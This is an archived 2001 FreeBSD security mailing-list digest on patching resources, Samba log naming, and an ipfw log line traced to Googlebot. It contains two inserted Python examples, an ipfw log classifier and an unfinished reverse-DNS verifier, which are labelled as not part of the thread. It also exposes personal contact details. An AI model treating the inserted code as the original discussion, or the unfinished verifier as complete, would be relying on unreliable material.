According to that list, there has only been one advisory in the base system since 4.3-RELEASE. Your question is a bit open-ended, of course, 'cause you don't state what version your new system is. Also, the Release Notes generally follow the advisories once the base system is patched. See section 2.2 of http://people.freebsd.org/~bmah/relnotes/4-STABLE/relnotes-i386.html --Erick At Fri, Jun 29, 2001 at 02:26:50AM +0100, Jonathan M. Slivko said this: :: Hello, :: :: Has anyone seen a URL or a book that has a hitlist of common things that :: need to be patched when installing a new system from scratch? Please :: e-mail me and let me know. Thanks! -- Jonathan :: :: /--------------------------------------------------------------\ :: Jonathan Slivko -- Black Lotus Comm. -- jslivko@jslivko.org :: www.jslivko.org - www.blacklotus.net - www.freebsd.org :: Phone: (212) 663-1109 -- Pager: (917) 388-5304 :: FreeBSD: The Power to Serve! :: \--------------------------------------------------------------/ :: :: :: To Unsubscribe: send mail to majordomo@FreeBSD.org :: with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 3: 7:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id A1AC237B406 for ; Fri, 29 Jun 2001 03:07:09 -0700 (PDT) (envelope-from sheldonh@starjuice.net) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.30 #1) id 15Fv8X-0006Eq-00; Fri, 29 Jun 2001 12:04:29 +0200 From: Sheldon Hearn To: Erick Mechler Cc: "Jonathan M. Slivko" , FreeBSD Security Mailing List Subject: Re: Hitlist for Security In-reply-to: Your message of "Thu, 28 Jun 2001 23:07:06 MST." 
<20010628230706.C10490@techometer.net> Date: Fri, 29 Jun 2001 12:04:29 +0200 Message-ID: <23983.993809069@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 28 Jun 2001 23:07:06 MST, Erick Mechler wrote: > I would start with the security advisories (www.freebsd.org/security). You would? I'd start with the Security chapter of the FreeBSD Handbook. :-) http://www.freebsd.org/handbook/security.html Then I'd look at Jan Koum's tutorial, which is linked off the security page you suggested. http://people.FreeBSD.org/~jkb/howto.html There's a lot of overlap. With this background under your belt, the security advisories are going to be a whole lot more useful. :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 4:11: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from aristotle.tamu.edu (Aristotle.tamu.edu [165.91.161.90]) by hub.freebsd.org (Postfix) with ESMTP id CB28A37B40B for ; Fri, 29 Jun 2001 04:10:52 -0700 (PDT) (envelope-from rasmith@aristotle.tamu.edu) Received: from aristotle.tamu.edu (IDENT:rasmith@localhost [127.0.0.1]) by aristotle.tamu.edu (8.9.3/8.8.7) with ESMTP id GAA32477; Fri, 29 Jun 2001 06:10:42 -0500 Message-Id: <200106291110.GAA32477@aristotle.tamu.edu> To: "Ryan Masse" Cc: "Lanny Baron" , "FreeBSD-Security" Subject: Re: samba vulnerability In-Reply-To: Message from "Ryan Masse" of "Fri, 29 Jun 2001 00:13:01 EDT." 
<014601c10051$ca88d2c0$3200a8c0@Home> Mime-Version: 1.0 (generated by tm-edit 7.106) Content-Type: text/plain; charset=US-ASCII Date: Fri, 29 Jun 2001 06:10:42 -0500 From: Robin Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

One reason the Samba security advisory about using such things as %m.log as filenames may not have merited a FreeBSD security advisory is that (IIRC) the default config in the FreeBSD samba port (both of them: 2.0 under net/samba and 2.2 under net/samba-devel) has by default used log.%m for machine logfiles for at least a few months now. Of course, if you decided to change the config you could open yourself up again. I'm only guessing about whether this is why there was no FreeBSD s.a.

Robin Smith

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 29 7:50:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP2.MC.VANDERBILT.EDU (mcsmtp2.mc.Vanderbilt.Edu [160.129.93.208]) by hub.freebsd.org (Postfix) with ESMTP id A4EEE37B406 for ; Fri, 29 Jun 2001 07:50:46 -0700 (PDT) (envelope-from George.Giles@mcmail.vanderbilt.edu) Subject: What is ipfw telling me ? To: freebsd-security@freebsd.org X-Mailer: Lotus Notes Release 5.0.3 March 21, 2000 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Fri, 29 Jun 2001 09:49:54 -0500 X-MIMETrack: Serialize by Router on MCSMTP2.MC.vanderbilt.edu/VUMC/Vanderbilt(Release 5.0.6a |January 17, 2001) at 06/29/2001 09:45:07 AM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

What is ipfw telling me ?
The 216 host is attempting to break in, but how is it using port 80 on the other machine ?

ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 29 7:59:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 539A837B401 for ; Fri, 29 Jun 2001 07:59:32 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1108 invoked by uid 1000); 29 Jun 2001 15:04:02 -0000 Date: Fri, 29 Jun 2001 18:04:02 +0300 From: Peter Pentchev To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@freebsd.org Subject: Re: What is ipfw telling me ? Message-ID: <20010629180402.B535@ringworld.oblivion.bg> Mail-Followup-To: George.Giles@mcmail.vanderbilt.edu, freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Fri, Jun 29, 2001 at 09:49:54AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Fri, Jun 29, 2001 at 09:49:54AM -0500, George.Giles@mcmail.vanderbilt.edu wrote:
> What is ipfw telling me ?
>
> The 216 host is attempting to break in, but how is it using port 80 on the
> other machine ?
>
> ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0

The host 216.239.46.20 is trying to connect to 10.0.0.1; the connection attempt is from port 21602 (ephemeral, unique to this connection in a certain timeframe) to port 80 on 10.0.0.1. That is, someone from 216.239.46.20 is trying to browse the web on 10.0.0.1.

G'luck,
Peter

-- 
This sentence claims to be an Epimenides paradox, but it is lying.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 8:35:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id 88B7B37B403 for ; Fri, 29 Jun 2001 08:35:13 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (localhost.veldy.net [127.0.0.1]) by veldy.net (Postfix) with SMTP id 78574BAAC; Fri, 29 Jun 2001 10:35:10 -0500 (CDT) Message-ID: <007801c100b0$e7527730$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: , References: Subject: Re: What is ipfw telling me ? Date: Fri, 29 Jun 2001 10:33:34 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You may want to limit such abuse via firewall rules. 
# Stop RFC1918 nets on the outside interface
${fwcmd} add deny log all from any to 10.0.0.0/8 via ${oif}
${fwcmd} add deny log all from any to 172.16.0.0/12 via ${oif}
${fwcmd} add deny log all from any to 192.168.0.0/16 via ${oif}

# Stop draft-manning-dsua-03.txt (1 May 2000) nets (includes RESERVED-1,
# DHCP auto-configuration, NET-TEST, MULTICAST (class D), and class E)
# on the outside interface
${fwcmd} add deny log all from any to 0.0.0.0/8 via ${oif}
${fwcmd} add deny log all from any to 169.254.0.0/16 via ${oif}
${fwcmd} add deny log all from any to 192.0.2.0/24 via ${oif}
${fwcmd} add deny log all from any to 224.0.0.0/4 via ${oif}
${fwcmd} add deny log all from any to 240.0.0.0/4 via ${oif}

Tom Veldhouse
veldy@veldy.net

----- Original Message -----
From:
To:
Sent: Friday, June 29, 2001 9:49 AM
Subject: What is ipfw telling me ?

> What is ipfw telling me ?
>
> The 216 host is attempting to break in, but how is it using port 80 on the
> other machine ?
>
> ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 29 9:17:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP2.MC.VANDERBILT.EDU (mcsmtp2.mc.Vanderbilt.Edu [160.129.93.208]) by hub.freebsd.org (Postfix) with ESMTP id 09C3137B409 for ; Fri, 29 Jun 2001 09:17:45 -0700 (PDT) (envelope-from George.Giles@mcmail.vanderbilt.edu) Subject: Re: What is ipfw telling me ?
To: Peter Pentchev Cc: freebsd-security@freebsd.org X-Mailer: Lotus Notes Release 5.0.3 March 21, 2000 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Fri, 29 Jun 2001 11:16:52 -0500 X-MIMETrack: Serialize by Router on MCSMTP2.MC.vanderbilt.edu/VUMC/Vanderbilt(Release 5.0.6a |January 17, 2001) at 06/29/2001 11:12:05 AM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I do not agree. Here's why:

the ipfw is on 10.0.0.2 and does not have a web server.
10.0.0.1 does.

I see a lot of these style attacks, various ports, various services used on 10.0.0.1, always proxying to another machine. That is, ipfw is on 10.0.0.2 and the signature of the log is:

attacker:port 10.0.0.1:port

It makes me think that somehow a proxy attack is going on.

The 10.x.x.x are not the actual addresses obviously.

George

Peter Pentchev, 06/29/2001 10:04 AM, To: George.Giles@mcmail.vanderbilt.edu, Subject: Re: What is ipfw telling me ?

On Fri, Jun 29, 2001 at 09:49:54AM -0500, George.Giles@mcmail.vanderbilt.edu wrote:
> What is ipfw telling me ?
>
> The 216 host is attempting to break in, but how is it using port 80 on the
> other machine ?
>
> ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0

The host 216.239.46.20 is trying to connect to 10.0.0.1; the connection attempt is from port 21602 (ephemeral, unique to this connection in a certain timeframe) to port 80 on 10.0.0.1. That is, someone from 216.239.46.20 is trying to browse the web on 10.0.0.1.

G'luck,
Peter

-- 
This sentence claims to be an Epimenides paradox, but it is lying.
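An added example, not code posted by anyone in this thread: a small Python parser for the ipfw log format Peter describes (rule number, action, protocol, then source address:port, then destination address:port, direction and interface), followed by the classification a practitioner wants when reading a line like George's: is this an ephemeral source port talking to a service port (a client, crawler or scanner reaching a server), and does the source or destination fall inside the RFC 1918 and bogon ranges from Tom's rules, which should never show up inbound on the outside interface. The sample log lines are constructed, the outside interface name xl0 is taken from George's line, and the split between privileged and ephemeral ports at 1023 is an assumption (on FreeBSD the real ephemeral range is set by the net.inet.ip.portrange sysctls).

```python
"""Parser and classifier for ipfw(8) log lines, e.g.

    ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0

Field order is: rule number, action, protocol, source addr[:port],
destination addr[:port], direction, "via", interface.  Added example for
this thread, not code posted by any of its participants; the log lines in
SAMPLE_LOG are constructed.
"""
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

# Networks that should never be the source or destination of a packet
# arriving on the outside interface (the list from Tom Veldhouse's rules:
# RFC 1918 plus the draft-manning-dsua bogons).
BOGON_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "0.0.0.0/8", "169.254.0.0/16", "192.0.2.0/24",
    "224.0.0.0/4", "240.0.0.0/4",
)]

# Assumption: ports >= 1024 are treated as ephemeral (client side).
EPHEMERAL_START = 1024

# ":port" is present only for TCP and UDP; ICMP lines look like
# "ICMP:8.0 1.2.3.4 5.6.7.8".  Anything before "ipfw:" (syslog timestamp,
# hostname, "/kernel:") is ignored.
LOG_RE = re.compile(
    r"ipfw:\s+(?P<rule>\d+)\s+(?P<action>\S+)\s+(?P<proto>\S+)\s+"
    r"(?P<src>\d+\.\d+\.\d+\.\d+)(?::(?P<sport>\d+))?\s+"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)(?::(?P<dport>\d+))?\s+"
    r"(?P<dir>in|out)\s+via\s+(?P<iface>\S+)"
)


def parse_ipfw_line(line: str) -> Optional[Dict[str, object]]:
    """Return the fields of one ipfw log line, or None if it is not one."""
    m = LOG_RE.search(line)
    if m is None:
        return None
    rec: Dict[str, object] = m.groupdict()
    rec["rule"] = int(m.group("rule"))
    rec["sport"] = int(m.group("sport")) if m.group("sport") else None
    rec["dport"] = int(m.group("dport")) if m.group("dport") else None
    return rec


def is_bogon(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in BOGON_NETS)


def classify(rec: Dict[str, object], outside_iface: str) -> List[str]:
    """Tags describing what the packet is, independent of the rule's action."""
    tags: List[str] = []
    sport, dport = rec["sport"], rec["dport"]
    if sport is not None and dport is not None:
        if sport >= EPHEMERAL_START and dport < EPHEMERAL_START:
            # Ephemeral source, well-known destination: a client (browser,
            # crawler, scanner) reaching a service, as in George's line.
            tags.append("client-to-service")
        elif sport < EPHEMERAL_START and dport >= EPHEMERAL_START:
            # Well-known source port: a reply from a server, or a low source
            # port (53, 20) chosen to slip past a stateless filter.
            tags.append("service-sourced")
    inbound_outside = rec["dir"] == "in" and rec["iface"] == outside_iface
    if inbound_outside and is_bogon(str(rec["dst"])):
        # The case Tom's "deny log all from any to 10.0.0.0/8 via ${oif}"
        # rules exist for.
        tags.append("bogon-dst-inbound")
    if inbound_outside and is_bogon(str(rec["src"])):
        tags.append("bogon-src-inbound")  # spoofed or leaked private source
    return tags


def summarize(log_text: str, outside_iface: str) -> List[Tuple[Dict[str, object], List[str]]]:
    """Parse every ipfw line in a syslog excerpt and classify it."""
    out = []
    for line in log_text.splitlines():
        rec = parse_ipfw_line(line)
        if rec is not None:
            out.append((rec, classify(rec, outside_iface)))
    return out


# Constructed sample: the line from the thread plus four made-up ones.
SAMPLE_LOG = """\
Jun 29 09:30:01 fw /kernel: ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0
Jun 29 09:30:02 fw /kernel: ipfw: 2400 Deny UDP 192.168.1.9:53 10.0.0.1:1025 in via xl0
Jun 29 09:30:03 fw /kernel: ipfw: 100 Accept TCP 10.0.0.5:1040 216.239.46.20:80 out via xl0
Jun 29 09:30:04 fw /kernel: ipfw: 300 Deny ICMP:8.0 203.0.113.7 10.0.0.1 in via xl0
Jun 29 09:30:05 fw sshd[123]: Accepted publickey for george from 10.0.0.5
"""

if __name__ == "__main__":
    for rec, tags in summarize(SAMPLE_LOG, "xl0"):
        print("rule %(rule)d %(action)s %(proto)s %(src)s:%(sport)s -> "
              "%(dst)s:%(dport)s %(dir)s via %(iface)s" % rec, tags)
```

Run on the constructed sample, George's line comes out tagged client-to-service and bogon-dst-inbound: an outside host with an ephemeral port trying port 80 on a private address, which is exactly the packet Tom's first deny rule is written to log.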
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 9:25:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 9D77A37B407 for ; Fri, 29 Jun 2001 09:24:58 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 5712 invoked by uid 1000); 29 Jun 2001 16:29:25 -0000 Date: Fri, 29 Jun 2001 19:29:25 +0300 From: Peter Pentchev To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@freebsd.org Subject: Re: What is ipfw telling me ? Message-ID: <20010629192925.F535@ringworld.oblivion.bg> Mail-Followup-To: George.Giles@mcmail.vanderbilt.edu, freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Fri, Jun 29, 2001 at 11:16:52AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 29, 2001 at 11:16:52AM -0500, George.Giles@mcmail.vanderbilt.edu wrote: > > I do not agree. Here's why: > > the ipfw is on 10.0.0.2 and does not have a web server. > 10.0.0.1 does. > > I see a lot of these style attacks, various ports, various services used on > 10.0.0.1, always proxying to another machine. That is ipfw is on 10.0.0.2 > and the signature of the log is: > > attacker:port 10.0.0.1:port > > It makes me think that somehow a proxy attack is going on. > > The 10.x.x.x are not the actual addresses obviously. Look. The ipfw logs (as you could easily test yourself) list the source and destination addresses of a TCP or UDP packet as saddr:sport daddr:dport. 
The log line you pasted clearly means that there was a TCP packet from 216.blah port 21602 (clearly ephemeral) to 10.0.0.1 port 80. Somebody is trying to reach port 80 on 10.0.0.1. If 10.0.0.1 is not directly reachable, then this might very well be a packet translated by a NAT (a.k.a. masquerading in the Linux world) gateway. It might be a proxy attack, but this depends on the structure of your network. All the log says is that 216.blah is trying to connect to the webserver on 10.0.0.1, and that's a fact.

G'luck,
Peter

-- 
This sentence claims to be an Epimenides paradox, but it is lying.

> Peter Pentchev, 06/29/2001 10:04 AM, To: George.Giles@mcmail.vanderbilt.edu, Subject: Re: What is ipfw telling me ?
>
> On Fri, Jun 29, 2001 at 09:49:54AM -0500,
> George.Giles@mcmail.vanderbilt.edu wrote:
> > What is ipfw telling me ?
> >
> > The 216 host is attempting to break in, but how is it using port 80 on
> the
> > other machine ?
> >
> > ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0
>
> The host 216.239.46.20 is trying to connect to 10.0.0.1; the connection
> attempt is from port 21602 (ephemeral, unique to this connection in
> a certain timeframe) to port 80 on 10.0.0.1. That is, someone from
> 216.239.46.20 is trying to browse the web on 10.0.0.1.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 29 12:55:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from d170h113.resnet.uconn.edu (d170h113.resnet.uconn.edu [137.99.170.113]) by hub.freebsd.org (Postfix) with SMTP id 5B12437B406 for ; Fri, 29 Jun 2001 12:55:25 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 45163 invoked by uid 1001); 29 Jun 2001 19:58:31 -0000 Message-ID: <20010629195831.45162.qmail@d170h113.resnet.uconn.edu> References: In-Reply-To: From: "Peter C. Lai" To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@freebsd.org Subject: Re: What is ipfw telling me ? Date: Fri, 29 Jun 2001 19:58:31 GMT Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Machines from the 216.239.46. subnet have been trying to attack my machine as well, and this is not an isolated incident. Furthermore, I also know that I am not on the vanderbilt.edu network. Would looking at mynetwatchman's database help me figure out any other trends in attacks coming from 216.239.46? Currently I'm not running any firewall (since I am not running any unsafe ports); only log_in_vain is enabled, but I almost want to configure ipf/w just so I can block this whole subnet.

George.Giles@mcmail.vanderbilt.edu writes:
> What is ipfw telling me ?
>
> The 216 host is attempting to break in, but how is it using port 80 on the
> other machine ?
>
> ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

-----------
Peter C. Lai
University of Connecticut
Dept. of Residential Life | Programmer
Dept.
of Molecular and Cell Biology | Undergraduate Research Assistant/Honors Program
http://cowbert.2y.net/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jun 29 14:15:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.32]) by hub.freebsd.org (Postfix) with ESMTP id 0573B37B403 for ; Fri, 29 Jun 2001 14:15:18 -0700 (PDT) (envelope-from appleseed@hushmail.com) Received: from user7.hushmail.com (user7.hushmail.com [64.40.111.47]) by smtp4.hushmail.com (Postfix) with ESMTP id 5F5FF2FAE; Fri, 29 Jun 2001 14:15:04 -0700 (PDT) Received: (from root@localhost) by user7.hushmail.com (8.9.3/8.9.3) id OAA06336; Fri, 29 Jun 2001 14:15:04 -0700 From: appleseed@hushmail.com Message-Id: <200106292115.OAA06336@user7.hushmail.com> Date: Fri, 29 Jun 2001 14:05:12 -0500 (PDT) Cc: Cc:@hushmail.com, freebsd-security@FreeBSD.ORG To: To:@hushmail.com, George.Giles@mcmail.vanderbilt.edu Mime-version: 1.0 Content-type: multipart/mixed; boundary="Hushpart_boundary_RWLcMrsQHdLLtTrWGhnDlLOMKlpjhyAF" Subject: Re: What is ipfw telling me ? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Hushpart_boundary_RWLcMrsQHdLLtTrWGhnDlLOMKlpjhyAF Content-type: text/plain

Sup,

# First I check to see who controls the subnet attacking u
define.northern_ % host -t ns 46.239.216.in-addr.arpa
46.239.216.in-addr.arpa name server NS2.GOOGLE.COM
46.239.216.in-addr.arpa name server NS3.GOOGLE.COM
46.239.216.in-addr.arpa name server NS4.GOOGLE.COM
46.239.216.in-addr.arpa name server NS1.GOOGLE.COM
# looks like our friend Google.com controls the NS at least.

# let's check to see if these are really google's hosts by picking
# random nodes
define.northern_ % host -t any 216.239.46.1
1.46.239.216.IN-ADDR.ARPA domain name pointer crawl1.googlebot.com
define.northern_ % host -t any 216.239.46.90
90.46.239.216.IN-ADDR.ARPA domain name pointer crawl4.googlebot.com
define.northern_ % host -t any 216.239.46.127
127.46.239.216.IN-ADDR.ARPA domain name pointer crawl5.googlebot.com
define.northern_ % host -t any 216.239.46.200
200.46.239.216.IN-ADDR.ARPA domain name pointer crawl8.googlebot.com
define.northern_ % host -t any 216.239.46.254
254.46.239.216.IN-ADDR.ARPA domain name pointer sjbi1-gige-6-1.google.com
define.northern_ %

According to our findings (and PTR->A lookup confirms) this subnet consists mainly of Google's botnet, which scours the net searching for new sites to index. ;-) I am going to assume here that someone is not spoofing google just to target your host on port 80. More than likely it's just good ol' Google trying to see if you have anything interesting to index on your website (if u have one). If you want to close off access to that subnet creating incoming tcp/udp sessions I suggest u upgrade to ipf (;-)) and define keep state rules as well as deny incoming session initialization attempts. This way u can still access google's nifty database but they can't access u =)

much love..
northern_ Free, encrypted, secure Web-based email at www.hushmail.com --Hushpart_boundary_RWLcMrsQHdLLtTrWGhnDlLOMKlpjhyAF-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 14:49:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (diskworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id BBD4837B40C for ; Fri, 29 Jun 2001 14:49:22 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1888 invoked by uid 1000); 29 Jun 2001 21:53:46 -0000 Date: Sat, 30 Jun 2001 00:53:46 +0300 From: Peter Pentchev To: appleseed@hushmail.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: What is ipfw telling me ? Message-ID: <20010630005346.A887@ringworld.oblivion.bg> Mail-Followup-To: appleseed@hushmail.com, freebsd-security@FreeBSD.ORG References: <200106292115.OAA06336@user7.hushmail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106292115.OAA06336@user7.hushmail.com>; from appleseed@hushmail.com on Fri, Jun 29, 2001 at 02:05:12PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 29, 2001 at 02:05:12PM -0500, appleseed@hushmail.com wrote: [snip] > If you want to > close off access to that subnet creating incoming tcp/udp sessions I suggest > u > upgrade to ipf (;-)) and define keep state rules as well as deny incoming > session > initialization attempts. This way u can still access google's nifty database > but they > cant access u =) Uhm. ipfw(4) is stateful, too. I suggest you take a look at ipfw(4) and ipfw(8) :) G'luck, Peter -- This sentence every third, but it still comprehensible. 
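An added example, not northern_'s own commands: the PTR lookup followed by the forward lookup that northern_ did by hand with host(1), written as a Python check you can run over every address the firewall logged. The point it enforces is the one northern_ only mentions in passing ("PTR->A lookup confirms"): whoever runs the reverse zone can put any name in a PTR record, so the name has to resolve forward to the same address, and it has to sit under a domain you trust for that crawler before you treat the traffic as benign (this is the same verification Google itself documents for identifying its crawlers). The resolver functions are injectable so the check runs offline; the lookup tables below are constructed, with 216.239.46.1 mirroring what northern_ saw and the 198.51.100.x entries made up as counterexamples.

```python
"""Forward-confirmed reverse DNS (FCrDNS) check for an address seen in
firewall logs.  Added example for this thread, not northern_'s commands:
it automates the PTR lookup followed by the A lookup that northern_ did by
hand with host(1).  A PTR record alone proves nothing, so the name it
returns must resolve forward to the same address and must sit under a
domain you trust for that crawler.  The offline lookup tables below are
constructed for the example.
"""
import socket
from typing import Callable, Dict, List, Tuple

PtrLookup = Callable[[str], str]        # address -> hostname (raises on NXDOMAIN)
ALookup = Callable[[str], List[str]]    # hostname -> addresses (raises on NXDOMAIN)


def system_ptr(addr: str) -> str:
    """PTR lookup through the system resolver."""
    return socket.gethostbyaddr(addr)[0]


def system_a(name: str) -> List[str]:
    """A lookup through the system resolver."""
    return socket.gethostbyname_ex(name)[2]


def under_domain(name: str, suffixes: Tuple[str, ...]) -> bool:
    """Match on a label boundary: googlebot.com must not accept notgooglebot.com."""
    return any(name == s or name.endswith("." + s) for s in suffixes)


def fcrdns(addr: str, trusted: Tuple[str, ...],
           ptr_lookup: PtrLookup = system_ptr,
           a_lookup: ALookup = system_a) -> Dict[str, object]:
    """Return {'addr', 'ptr', 'forward_ok', 'trusted', 'reason'} for one address."""
    result: Dict[str, object] = {
        "addr": addr, "ptr": None, "forward_ok": False, "trusted": False, "reason": "",
    }
    try:
        name = ptr_lookup(addr).rstrip(".").lower()
    except (OSError, LookupError):   # socket.herror is an OSError; KeyError from the fakes
        result["reason"] = "no PTR record"
        return result
    result["ptr"] = name
    try:
        forward = a_lookup(name)
    except (OSError, LookupError):
        result["reason"] = "PTR name %s does not resolve" % name
        return result
    if addr not in forward:
        # The reverse zone claims a name the forward zone does not back up.
        result["reason"] = "forward lookup of %s does not include %s" % (name, addr)
        return result
    result["forward_ok"] = True
    if under_domain(name, trusted):
        result["trusted"] = True
        result["reason"] = "forward-confirmed under trusted domain"
    else:
        result["reason"] = "forward-confirmed, but not under a trusted domain"
    return result


def untrusted(addrs: List[str], trusted: Tuple[str, ...],
              ptr_lookup: PtrLookup = system_ptr,
              a_lookup: ALookup = system_a) -> List[str]:
    """Addresses that fail the check: candidates for a deny rule."""
    return [a for a in addrs if not fcrdns(a, trusted, ptr_lookup, a_lookup)["trusted"]]


# Constructed offline tables.  216.239.46.1 mirrors what northern_ saw; the
# 198.51.100.x entries are made-up counterexamples (a PTR pointing at a
# Google name that does not resolve back, and a look-alike domain).
FAKE_PTR = {
    "216.239.46.1": "crawl1.googlebot.com.",
    "198.51.100.9": "crawl9.googlebot.com.",
    "198.51.100.10": "crawl1.notgooglebot.com.",
}
FAKE_A = {
    "crawl1.googlebot.com": ["216.239.46.1"],
    "crawl9.googlebot.com": ["216.239.46.9"],
    "crawl1.notgooglebot.com": ["198.51.100.10"],
}


def fake_ptr(addr: str) -> str:
    return FAKE_PTR[addr]            # KeyError stands in for NXDOMAIN


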